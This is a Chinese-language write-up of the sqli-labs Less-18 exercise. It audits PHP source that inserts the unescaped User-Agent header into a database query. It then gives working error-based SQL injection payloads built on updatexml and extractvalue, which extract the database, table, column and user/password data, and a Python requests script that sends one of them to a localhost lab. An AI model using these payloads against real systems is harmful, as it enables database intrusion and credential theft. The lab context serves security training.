SQL注入 Less18(头部注入+报错注入)

登录Dumb:Dumb

源码审计

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
	
function check_input($value)
	{
    
	if(!empty($value))
		{
    
		// truncation (see comments)
		$value = substr($value,0,20);
		}

		// Stripslashes if magic quotes enabled
		if (get_magic_quotes_gpc())
			{
    
			$value = stripslashes($value);
			}

		// Quote if not a number
		if (!ctype_digit($value))
			{
    
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
		
	else
		{
    
		$value = intval($value);
		}
	return $value;
	}



	$uagent = $_SERVER['HTTP_USER_AGENT'];
	$IP = $_SERVER['REMOTE_ADDR'];
	echo "<br>";
	echo 'Your IP ADDRESS is: ' .$IP;
	echo "<br>";
	//echo 'Your User Agent is: ' .$uagent; // take the variables if(isset($_POST['uname']) && isset($_POST['passwd'])) { $uname = check_input($_POST['uname']); $passwd = check_input($_POST['passwd']); /* echo 'Your Your User name:'. $uname; echo "<br>"; echo 'Your Password:'. $passwd; echo "<br>"; echo 'Your User Agent String:'. $uagent; echo "<br>"; echo 'Your User Agent String:'. $IP; */ //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'User Agent:'.$uname."\n"); fclose($fp); $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1"; $result1 = mysql_query($sql); $row1 = mysql_fetch_array($result1); if($row1) { echo '<font color= "#FFFF00" font size = 3 >'; $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)"; mysql_query($insert); //echo 'Your IP ADDRESS is: ' .$IP; echo "</font>"; //echo "<br>"; echo '<font color= "#0000ff" font size = 3 >'; echo 'Your User Agent is: ' .$uagent; echo "</font>"; echo "<br>"; print_r(mysql_error()); echo "<br><br>"; echo '<img src="../images/flag.jpg"  />'; echo "<br>"; } else { echo '<font color= "#0000ff" font size="3">'; //echo "Try again looser"; print_r(mysql_error()); echo "</br>"; echo "</br>"; echo '<img src="../images/slap.jpg"   />';	
			echo "</font>";  
			}

	}

?>

check_input函数，SQL注入 Less17(报错注入+子查询)，看上一题

$value = substr($value,0,20);但是这次取前二十个字符

$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];

$_SERVER 是 PHP 预定义变量之一，可以直接使用，它是一个包含了诸如头信息（header）、路径（path）及脚本位置（script locations）信息的数组。
$_SERVER 数组中的元素由 Web 服务器创建，但不能保证每个服务器都提供全部元素，有的服务器可能会忽略一些，或者提供一些没有在这里列举出来的元素。

$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);

这次$passwd也加了check_input函数，所以不能通过passwd进行SQL注入了

$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);

一个select查询语句，因为必须要$row1不为空，才可以进入下面的if，所以我们输入的uname和passwd都必须是正确存在的用户。

核心代码

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);

$uagent被插入进数据库。

我们控制$uagent执行我们的payload

INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('' or updatexml(1, concat('#', database()), 0), 1, 1) #

所以设置$uagent为

' or updatexml(1, concat('#', database()), 0), 1, 1) #

直接把后面的$IP, $uname也一并写死了

当然也可以
' and updatexml(1, concat('#', database()), 0) and '1'='1

' or updatexml(1, concat("#", (select group_concat(table_name) from information_schema.tables where table_schema="security")), 0),1,1)#

' or updatexml(1, concat("#", (select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")), 0),1,1) #

' or updatexml(1, concat("#", (select group_concat(username,password) from users)), 0),1,1) #

#coding:utf-8
import requests
url = "http://localhost/sqli-labs-master/sqli-labs-master/Less-18/"
str = "flag"
print("start!")
key = {
    'uname': "admin",'passwd':"admin"}
headers = {
    
    "Host": "localhost",
    "User-Agent": "'and extractvalue(1,concat('~',(select schema_name from information_schema.schemata limit 5,1),'~')) and '1'='1",                                                           ""
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "Content-Length": "34",
    "Referer": "http://localhost/sqli-labs-master/sqli-labs-master/Less-18/",
    "Cookie": "Phpstorm-b508df8e=d3fe512f-f910-46f4-ac3f-7937af84827d",
    "Connection": "keep-alive",
    "Upgrade-Insecure-Requests": "1",
    "Pragma": "no-cache",
    "Cache-Control": "no-cache"
}
res = requests.post(url,headers = headers,data=key).text
if str in res:
    print("fish!")
    print(res)
print("end!")